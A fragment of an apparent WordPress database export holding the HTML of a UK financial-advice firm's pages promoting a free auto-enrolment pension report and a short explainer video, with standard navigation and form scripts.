href=\"../discretionary-\">Discretionary Trusts</a></li>&#13;\n	<li id=\"menu-item-115\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-115\"><a href=\"../absolute-\">Absolute Trusts</a></li>&#13;\n	<li id=\"menu-item-143\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-143\"><a href=\"../gift-loan-schemes/\">Gift &amp; Loan Trust</a></li>&#13;\n	<li id=\"menu-item-146\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-146\"><a href=\"../wills-and-trust/\">Wills and Trust</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-3381\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-3381\"><a href=\"../insurance-protection/\">Insurance</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-3535\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3535\"><a href=\"../critical-illness-insurance-2-0/\">Critical Illness</a></li>&#13;\n	<li id=\"menu-item-3585\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3585\"><a href=\"../serious-illness-cover/\">Serious Illness</a></li>&#13;\n	<li id=\"menu-item-4633\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-4633\"><a href=\"../relevant-life-plan/\">Relevant Life Plan</a></li>&#13;\n	<li id=\"menu-item-7228\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7228\"><a href=\"../life-insurance/\">Life Insurance</a></li>&#13;\n	<li id=\"menu-item-7243\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7243\"><a href=\"../business-protection-insurance/\">Business Protection</a></li>&#13;\n</ul></li>&#13;\n		</ul></nav></div>&#13;\n	</header></div>		</div>&#13;\n				<div id=\"sliders-container\">&#13;\n									</div>&#13;\n																<div id=\"main\" class=\"\" style=\"overflow:hidden !important;\">&#13;\n		<div class=\"avada-row\" style=\"\">&#13;\n				<div id=\"content\" class=\"full-width\">&#13;\n				<div id=\"post-1880\" class=\"post-1880 page type-page status-publish hentry\">&#13;\n			<span class=\"entry-title\" style=\"display: none;\">Auto Enrolment Report</span>&#13;\n			<span class=\"updated\" style=\"display: none;\">February 25th, 2017</span>&#13;\n			<span class=\"vcard\" style=\"display: none;\"><span class=\"fn\"><a href=\"/\" title=\"Posts by Paul Bassi\" rel=\"author\">Sam Bassi</a></span></span>&#13;\n						<div class=\"post-content\">&#13;\n				<h1><span style=\"font-family: arial,helvetica,sans-serif;\"><big>Our FREE Report Helps Take the</big></span></h1>&#13;\n<h1><big><span style=\"font-family: arial,helvetica,sans-serif;\"> Complexity out of Auto Enrolment</span> </big></h1>&#13;\n<p style=\"text-align: left;\"><span style=\"font-family: arial,helvetica,sans-serif;\"><div class=\"two_third\">&#13;\n<p><span style=\"font-family: arial,helvetica,sans-serif; font-size: x-large;\"><span style=\"color: #afd9a5;\">A BETTER Way For Companies to Access an End to End Workplace Pensions Solution. </span></span></p>&#13;\n<p><span style=\"font-family: arial,helvetica,sans-serif; font-size: x-large;\"><span style=\"color: #afd9a5;\">We Focus on Your Needs as an Employer and Deliver Real Value in an Effective Way to Your Employees</span></span></p>&#13;\n<p><span style=\"font-family: arial,helvetica,sans-serif;\"><div class=\"demo-sep sep-none\" style=\"margin-top:40px;\"/><div class=\"title\"><h2>Auto Enrolment – Initial Assessment</h2><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div></span></p>&#13;\n<p><span style=\"font-family: arial,helvetica,sans-serif; font-size: medium;\">Like most companies you’re probably aware of Auto Enrolment Pensions but aren’t exactly sure how or why it’s relevant to you?</span></p>&#13;\n<p style=\"text-align: left;\"><span style=\"font-family: arial,helvetica,sans-serif;\"><span style=\"font-size: medium;\">Then claim your online &amp; tailored auto enrolment pension report today.</span></span></p></div><div class=\"one_third last\">&#13;\n<h1><span style=\"font-family: arial,helvetica,sans-serif;\"/></h1>&#13;\n<p style=\"text-align: left;\"><span style=\"font-family: arial,helvetica,sans-serif;\"/></p></div><div class=\"clearboth\"/></span></p><div class=\"one_half\">&#13;\n<p><span style=\"font-family: arial,helvetica,sans-serif; font-size: medium;\">Specific to your business your report will provide you with all the facts you need to know about, and take you from confusion to clarity in 5 easy steps.</span></p>&#13;\n<p><span style=\"font-family: arial,helvetica,sans-serif; font-size: medium;\">Our FREE report will show you:</span></p>&#13;\n<ul><li><span style=\"font-family: arial,helvetica,sans-serif; font-size: medium;\">When the changes affect you.</span></li>&#13;\n<li><span style=\"font-family: arial,helvetica,sans-serif; font-size: medium;\">What you need to do.</span></li>&#13;\n<li><span style=\"font-family: arial,helvetica,sans-serif; font-size: medium;\">What will happen if you do nothing.</span></li>&#13;\n<li><span style=\"font-family: arial,helvetica,sans-serif; font-size: medium;\">How we can help you.</span></li>&#13;\n</ul><p><span style=\"font-family: arial,helvetica,sans-serif; font-size: medium;\">Our specialist Auto Enrolment team can guide you through the new legislation and take you on a clear path to meeting your regulatory requirements.</span></p>&#13;\n<p><span style=\"font-family: arial,helvetica,sans-serif; font-size: medium;\">We provide this through simple straight forward independent advice that will save you more time, effort and expense.</span></p>&#13;\n<p style=\"text-align: center;\"><span style=\"text-decoration: underline; color: #afd9a5;\"><span style=\"font-family: arial,helvetica,sans-serif; font-size: medium;\">Fill out the form to the right to get started</span></span></p>&#13;\n<p style=\"text-align: left;\"><span style=\"font-family: arial,helvetica,sans-serif;\"/></p></div><div class=\"one_half last\"><div id=\"iphorm-outer-52fde72f0ada4\" class=\"iphorm-outer iphorm-outer-13 iphorm-uniform-theme-default iphorm-theme-light-rounded\">&#13;\n    <script type=\"text/javascript\"><![CDATA[\r\n	<!--\r\n		    jQuery(document).ready(function($) {\r\n			\r\n        	$(\'#iphorm-52fde72f0ada4\').iPhorm({\"id\":13,\"uniqueId\":\"52fde72f0ada4\",\"PHPSESSID\":\"5518e6d1a537bfe4b994afd1ab0f4853\",\"useAjax\":true,\"successMessageTimeout\":10,\"clElementIds\":[],\"clDependentElementIds\":[],\"centerFancybox\":true,\"centerFancyboxSpeed\":true});\r\n\r\n	        	        if ($.isFunction($.fn.qtip)) {\r\n	            $(\'.iphorm-tooltip-hover\', iPhorm.instance.$form).qtip({\r\n	                style: {\r\n	                    classes: \'qtip-plain qtip-shadow qtip-rounded\'\r\n	                },\r\n	                position: {\r\n	                    my: \'left center\',\r\n	                    at: \'right center\'\r\n	                }\r\n	            });\r\n	            $(\'.iphorm-tooltip-click\', iPhorm.instance.$form).qtip({\r\n	                style: {\r\n	                    classes: \'qtip-plain qtip-shadow qtip-rounded\'\r\n	                },\r\n	                position: {\r\n	                    my: \'left center\',\r\n	                    at: \'right center\'\r\n	                },\r\n	                show: {\r\n	                    event: \'focus\'\r\n	                },\r\n	                hide: {\r\n	                    event: \'unfocus\'\r\n	                }\r\n	            });\r\n	            $(\'.iphorm-tooltip-icon-hover\', iPhorm.instance.$form).qtip({\r\n	                style: {\r\n	                    classes: \'qtip-plain qtip-shadow qtip-rounded\'\r\n	                },\r\n	                position: {\r\n	                    my: \'left center\',\r\n	                    at: \'right center\'\r\n	                },\r\n	                content: {\r\n	                    text: function (api) {\r\n	                        return $(this).find(\'.iphorm-tooltip-icon-content\')();\r\n	                    }\r\n	                }\r\n	            });\r\n	            $(\'.iphorm-tooltip-icon-click\', iPhorm.instance.$form).qtip({\r\n	                style: {\r\n	                    classes: \'qtip-plain qtip-shadow qtip-rounded\'\r\n	                },\r\n	                position: {\r\n	                    my: \'left center\',\r\n	                    at: \'right center\'\r\n	                },\r\n	                show: {\r\n	                    event: \'click\'\r\n	                },\r\n	                hide: {\r\n	                    event: \'unfocus\'\r\n	                },\r\n	                content: {\r\n	                    text: function (api) {\r\n	                        return $(this).find(\'.iphorm-tooltip-icon-content\')();\r\n	                    }\r\n	                }\r\n	            });\r\n	            $(\'.iphorm-labels-inside > .iphorm-element-spacer > label\').hover(function () {\r\n	                $(this).siblings(\'.iphorm-input-wrap\').find(\'.iphorm-tooltip-hover\').qtip(\'show\');\r\n	            }, function () {\r\n	            	$(this).siblings(\'.iphorm-input-wrap\').find(\'.iphorm-tooltip-hover\').qtip(\'hide\');\r\n	            });\r\n	        }\r\n	        \r\n	        	        if ($.isFunction($.fn.uniform)) {\r\n	            $(\'select, input:checkbox, input:radio\', iPhorm.instance.$form).uniform({context: iPhorm.instance.$form, selectAutoWidth: false});\r\n	        }\r\n	        \r\n	        if ($.isFunction($.fn.inFieldLabels)) {\r\n	            $(\'.iphorm-labels-inside:not(.iphorm-element-wrap-recaptcha) > .iphorm-element-spacer > label\', iPhorm.instance.$form).inFieldLabels();\r\n	        }\r\n\r\n	        \r\n	        $(\'.iphorm-group-row > div:last-child:not(:first-child)\', iPhorm.instance.$form).add(\'.iphorm-group-row:last-child\', iPhorm.instance.$form).addClass(\'last-child\');\r\n\r\n	        	    }); // end document.ready()\r\n	//-->\r\n	]]></script><form id=\"iphorm-52fde72f0ada4\" class=\"iphorm iphorm-form-13\" action=\"../auto-enrolment-report/\" method=\"post\" enctype=\"multipart/form-data\">&#13;\n        &#13;\n            &#13;\n    <script type=\"text/javascript\"><![CDATA[\r\n	<!--\r\n	jQuery(\'#iphorm-outer-52fde72f0ada4 script\').remove();\r\n	//-->\r\n	]]></script></form></div>&#13;\n<p style=\"text-align: left;\"><span style=\"font-family: arial,helvetica,sans-serif;\"/></p></div><div class=\"clearboth\"/><div class=\"demo-sep sep-double\" style=\"margin-top:0px;margin-bottom:0px\"/>&#13;\n<p style=\"text-align: left;\"/><div class=\"one_half\">&#13;\n<p style=\"text-align: left;\"><style type=\"text/css\"><![CDATA[\r\n		#testimonials-1 q{background-color:#f6f6f6 !important;color:#747474 !important;}\r\n		#testimonials-1 .review blockquote div:after{border-top-color:#f6f6f6 !important;}\r\n		]]></style></p><div id=\"testimonials-1\" class=\"reviews clearfix\">&#13;\n<div class=\"review male\"><blockquote><q>“From first phone call to completion it was a very helpfu, pleasant and professional experience. All of the staff I encountered were couteous, polite and knowledgeable. First class service.”</q><div class=\"clearfix\"><span class=\"company-name\">David McCall</span></div></blockquote></div>&#13;\n</div>&#13;\n<p style=\"text-align: left;\"/></div>&#13;\n<p style=\"text-align: left;\"/><div class=\"one_half last\">&#13;\n<p style=\"text-align: left;\"><style type=\"text/css\"><![CDATA[\r\n		#testimonials-2 q{background-color:#f6f6f6 !important;color:#747474 !important;}\r\n		#testimonials-2 .review blockquote div:after{border-top-color:#f6f6f6 !important;}\r\n		]]></style></p><div id=\"testimonials-2\" class=\"reviews clearfix\">&#13;\n<div class=\"review male\"><blockquote><q>“Very pleased with the service provided. Highly professional and standard of information provided was very comprehensive. i was kept informed at all stages of the process.”</q><div class=\"clearfix\"><span class=\"company-name\">Stephen McCoy</span></div></blockquote></div>&#13;\n</div>&#13;\n<p style=\"text-align: left;\"/></div><div class=\"clearboth\"/>&#13;\n							</div>&#13;\n					</div>&#13;\n			</div>&#13;\n		</div>&#13;\n	</div>&#13;\n				<footer class=\"footer-area\"><div class=\"avada-row\">&#13;\n			<section class=\"columns columns-3\"><article class=\"col\"><div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">		<p>Latest Wealth Management News</p>		<ul><li>&#13;\n				<a href=\"../seven-deadly-investment-sins/\">The Seven Deadly Investment Sins</a>&#13;\n							<span class=\"post-date\">February 10, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../mortgage-strategic-alliance/\">Mortgage Strategic Alliance</a>&#13;\n							<span class=\"post-date\">February 5, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../esmart-money-januaryfebruary-2014-issue/\">eSmart Money January/February 2017 issue</a>&#13;\n							<span class=\"post-date\">January 7, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../how-much-money-can-i-get-pension/\">How much Money can I get out of my Pension?</a>&#13;\n							<span class=\"post-date\">October 31, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../what-does-a-wealth-managerdo/\">What Does a Wealth Manager Do?</a>&#13;\n							<span class=\"post-date\">September 5, 2017</span>&#13;\n						</li>&#13;\n				</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"text-13\" class=\"footer-widget-col widget_text\"><p>Equity SMART</p>			<div class=\"textwidget\"><p>This year, 2017, sees us reach our 20 year anniversary. In all that time we’ve seen real changes in the financial market, but our core values have forever remained the same. Put simply, we’ve always striven to offer unbiased and objective financial advice, with a view to protecting and enhancing our client’s wealth and sense of well-being. Welcome to our company.</p>&#13;\n</div>&#13;\n		<div style=\"clear:both;\"/></div><div id=\"recent_works-widget-3\" class=\"footer-widget-col recent_works\"><p>Useful Guides</p>		<div class=\"recent-works-items clearfix\">&#13;\n								<a href=\"../portfolio-items/smart-money-nov-dec/\" title=\"Smart Money: Nov-Dec\">&#13;\n					</a>&#13;\n						<a href=\"../portfolio-items/critical-illness-guide/\" title=\"Critical Illness Guide\">&#13;\n					</a>&#13;\n						<a href=\"../portfolio-items/guide-auto-enrolment/\" title=\"A Guide To Auto Enrolment\">&#13;\n					</a>&#13;\n						<a href=\"/\" title=\"Investing For Income\">&#13;\n					</a>&#13;\n				</div>&#13;\n&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col\"/><article class=\"col last\"/></section></div>&#13;\n	</footer><footer id=\"footer\"><div class=\"avada-row\">&#13;\n					<ul class=\"copyright\"><li><br/><br/></li>&#13;\n			</ul></div>&#13;\n	</footer></div><!-- wrapper -->&#13;\n	&#13;\n	&#13;\n	<script type=\"text/javascript\" src=\"../maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/main-min.js\"/></body>','Auto Enrolment Report Download','Get your free Auto Enrolment report from Equity SMART. We review your information and send you an initial tailored assessment based.','publish','closed','closed','','auto-enrolment-report-download','','','2017-09-21 16:34:26','2017-09-21 16:34:26','',0,'http://www.equalitywalk.org.uk/auto-enrolment-report-download',0,'page','',0),(52,1,'2017-09-21 16:34:27','2017-09-21 16:34:27','<body class=\"single single-post postid-8772 single-format-video light  wpb-js-composer js-comp-ver-4.1.2 vc_responsive\" data-spy=\"scroll\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n	<div id=\"wrapper\">&#13;\n								<div class=\"header-wrapper\">&#13;\n			<div class=\"header-v3\">&#13;\n		&#13;\n		<header id=\"header\"><div class=\"avada-row\" style=\"margin-top:0px;margin-bottom:0px;\">&#13;\n			<div class=\"logo\" style=\"margin-right:0px;margin-top:15px;margin-left:0px;margin-bottom:15px;\">&#13;\n				<a href=\"/\">&#13;\n					&#13;\n									</a>&#13;\n			</div>&#13;\n						<nav id=\"nav\" class=\"nav-holder\"><ul class=\"navigation menu fusion-navbar-nav\"><li id=\"menu-item-7214\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-7214 fusion-dropdown-menu\"><a href=\"../wealth-management/\">Wealth Management</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-44\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-44 fusion-dropdown-submenu\"><a href=\"../wealth-platform/\">Wealth Platform</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-27\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-27 fusion-megamenu-menu\"><a href=\"../pensions/\">Pensions</a>&#13;\n<div class=\"fusion-megamenu-wrapper columns-3 col-span-12 container\"><div class=\"row\">&#13;\n&#13;\n<ul class=\"fusion-megamenu-holder\"><ul class=\"fusion-megamenu \"><li id=\"menu-item-8353\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8353 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\">Pensions&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6154\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6154\"><a href=\"../pensions/pension-review/\"><span class=\"fusion-megamenu-bullet\"/>Pension Review</a></li>&#13;\n		<li id=\"menu-item-95\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-95\"><a href=\"../pensions/sipps/\"><span class=\"fusion-megamenu-bullet\"/>SIPPS</a></li>&#13;\n		<li id=\"menu-item-967\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-967\"><a href=\"../pensions/pension-release/\"><span class=\"fusion-megamenu-bullet\"/>Pension Release</a></li>&#13;\n		<li id=\"menu-item-741\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-741\"><a href=\"../pensions/pension-transfer/\"><span class=\"fusion-megamenu-bullet\"/>Pension Transfer</a></li>&#13;\n		<li id=\"menu-item-6848\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6848\"><a href=\"../tracking-down-your-lost-pension/\"><span class=\"fusion-megamenu-bullet\"/>Lost Pension</a></li>&#13;\n	</ul></h3></li>&#13;\n	<li id=\"menu-item-8579\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8579 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\">At Retirement&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-139\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-139\"><a href=\"../pensions/income-drawdown/\"><span class=\"fusion-megamenu-bullet\"/>Income Drawdown</a></li>&#13;\n		<li id=\"menu-item-8599\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-8599\"><a href=\"../best-annuity-rates/\"><span class=\"fusion-megamenu-bullet\"/>Annuities</a></li>&#13;\n		<li id=\"menu-item-8580\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8580\"><div class=\"fusion-megamenu-widgets-container\"><div id=\"wooslider_slideshow_posts-2\" class=\"widget widget_wooslider_slideshow_posts\"><div id=\"wooslider-id-1\" class=\"wooslider wooslider-id-1 wooslider-type-posts wooslider-theme-default\"><ul class=\"slides\"><li class=\"slide\">&#13;\n<div class=\"layout-text-left overlay-none\"><a href=\"http://www.equalitywalk.org.uk/better-pension-drawdown-annuity/\"/><div class=\"slide-excerpt\"><h2 class=\"slide-title\"><a href=\"../better-pension-drawdown-annuity/\">Which is Better Pension Drawdown or Annuity?</a></h2></div></div></li>&#13;\n</ul></div>&#13;\n</div></div></li>&#13;\n	</ul></h3></li>&#13;\n	<li id=\"menu-item-6852\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-6852 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\">For Business&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-136\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-136\"><a href=\"../pensions/auto-enrolment-pensions/\"><span class=\"fusion-megamenu-bullet\"/>Auto Enrolment Pensions</a></li>&#13;\n		<li id=\"menu-item-6494\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6494\"><a href=\"../auto-enrolment-report/\"><span class=\"fusion-megamenu-bullet\"/>Auto Enrolment Report</a></li>&#13;\n		<li id=\"menu-item-133\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-133\"><a href=\"../pensions/group-pension-plan/\"><span class=\"fusion-megamenu-bullet\"/>Group Pension Plan</a></li>&#13;\n	</ul></h3></li>&#13;\n&#13;\n</ul></ul><div style=\"clear:both;\"/>&#13;\n</div>&#13;\n</div>&#13;\n</li>&#13;\n<li id=\"menu-item-8624\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8624 fusion-megamenu-menu\"><a>Other Services</a>&#13;\n&#13;\n</li>&#13;\n<li id=\"menu-item-7672\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-7672 fusion-dropdown-menu\"><a href=\"../about-us/\">About</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-7676\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7676 fusion-dropdown-submenu\"><a href=\"../our-team/\">Our Team</a></li>&#13;\n	<li id=\"menu-item-7677\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7677 fusion-dropdown-submenu\"><a href=\"../about-us/testimonials/\">Testimonials</a></li>&#13;\n	<li id=\"menu-item-7673\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-7673 fusion-dropdown-submenu\"><a href=\"https://rsr.wrapadviser.co.uk/home.aspx?logout=1\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-menu\',\'http://rsr.wrapadviser.co.uk\']);\">Login</a></li>&#13;\n	<li id=\"menu-item-7680\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7680 fusion-dropdown-submenu\"><a href=\"../terms-of-use/\">Terms Of Use</a></li>&#13;\n	<li id=\"menu-item-7681\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7681 fusion-dropdown-submenu\"><a href=\"../privacy-policy/\">Privacy Policy</a></li>&#13;\n	<li id=\"menu-item-7682\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7682 fusion-dropdown-submenu\"><a href=\"../cookies/\">Cookies</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-7674\" class=\"menu-item menu-item-type-custom menu-item-object-custom current-menu-ancestor menu-item-has-children menu-item-7674 fusion-dropdown-menu\"><a>Blog</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-8734\" class=\"menu-item menu-item-type-custom menu-item-object-custom current-menu-ancestor current-menu-parent menu-item-has-children menu-item-8734 fusion-dropdown-submenu\"><a href=\"../category/video-2/\">Watch Our Blog</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-8732\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8732\"><a href=\"../pension-reforms-offer-freedom-savers/\">Pension Reforms Offer Freedom to Savers</a></li>&#13;\n		<li id=\"menu-item-8771\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8771\"><a href=\"../staging-date-social-advisors/\">When is your Staging Date?</a></li>&#13;\n		<li id=\"menu-item-8781\" class=\"menu-item menu-item-type-post_type menu-item-object-post current-menu-item menu-item-8781\"><a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a></li>&#13;\n		<li id=\"menu-item-8780\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8780\"><a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a></li>&#13;\n	</ul></li>&#13;\n	<li id=\"menu-item-8733\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8733 fusion-dropdown-submenu\"><a href=\"../our-blog/\">Read Our Blog</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-8587\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8587\"><a href=\"../category/annuities/\">Annuities</a></li>&#13;\n		<li id=\"menu-item-8588\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8588\"><a href=\"../category/insurance-protection/\">Insurance Protection</a></li>&#13;\n		<li id=\"menu-item-8589\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8589\"><a href=\"../category\">Investments</a></li>&#13;\n		<li id=\"menu-item-8590\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8590\"><a href=\"../category/pensions/\">Pensions</a></li>&#13;\n		<li id=\"menu-item-8591\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8591\"><a href=\"../category/\">Trusts</a></li>&#13;\n		<li id=\"menu-item-8592\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8592\"><a href=\"../category/wealth-management/\">Wealth Management</a></li>&#13;\n	</ul></li>&#13;\n</ul></li>&#13;\n		</ul></nav><div class=\"mobile-nav-holder main-menu\"/>&#13;\n					</div>&#13;\n	</header></div>		<div class=\"init-sticky-header\"/>&#13;\n		</div>&#13;\n						<div id=\"sliders-container\">&#13;\n									</div>&#13;\n		&#13;\n			<div class=\"page-title-container\">&#13;\n		<div class=\"page-title\">&#13;\n			<div class=\"page-title-wrapper\">&#13;\n				<div class=\"page-title-captions\">&#13;\n										<h1 class=\"entry-title\">&#13;\n										What is Automatic Enrolment										</h1>&#13;\n														</div>&#13;\n															<ul class=\"breadcrumbs\"><li> <a href=\"/\">Home</a></li><li><a href=\"../category/video-2/\" title=\"Video\">Video</a></li><li>What is Automatic Enrolment</li></ul></div>&#13;\n		</div>&#13;\n	</div>&#13;\n																			<div id=\"main\" class=\"clearfix \" style=\"\">&#13;\n		<div class=\"avada-row\" style=\"\">&#13;\n		&#13;\n										<div id=\"post-8772\" class=\"post-8772 post type-post status-publish format-video hentry category-video-2 post\">&#13;\n												<span class=\"entry-title\" style=\"display: none;\">What is Automatic Enrolment</span>&#13;\n						<div class=\"post-content\">&#13;\n				<p><iframe class=\"wistia_embed\" src=\"http://fast.wistia.net/embed/iframe/r27jwb95gy\" name=\"wistia_embed\" width=\"640\" height=\"388\" frameborder=\"0\" scrolling=\"no\" allowfullscreen=\"allowfullscreen\"/></p>&#13;\n							</div>&#13;\n									<div class=\"meta-info\">&#13;\n				<div class=\"vcard\">&#13;\n					By <span class=\"fn\"><a href=\"../author/rs-r-admin/\" title=\"Posts by Equity SMART\" rel=\"author\">Equity SMART</a></span><span class=\"sep\">|</span>Categories: <a href=\"../category/video-2/\" title=\"View all posts in Video\" rel=\"category tag\">Video</a><span class=\"sep\">|</span><span class=\"meta-tags\">Tags: </span><span class=\"sep\">|</span><a href=\"../automatic-enrolment/\" title=\"Comment on What is Automatic Enrolment\">0 Comments</a>				</div>&#13;\n			</div>&#13;\n												<div class=\"share-box\">&#13;\n				<h4> </h4>&#13;\n				<ul class=\"social-networks social-networks-dark\"><li class=\"facebook\">&#13;\n						<a href=\"http://www.facebook.com/sharer.php?m2w&amp;s=100&amp;p[url]=http://www.equalitywalk.org.uk/automatic-enrolment/&amp;p[title]=What%20is%20Automatic%20Enrolment\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Facebook&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								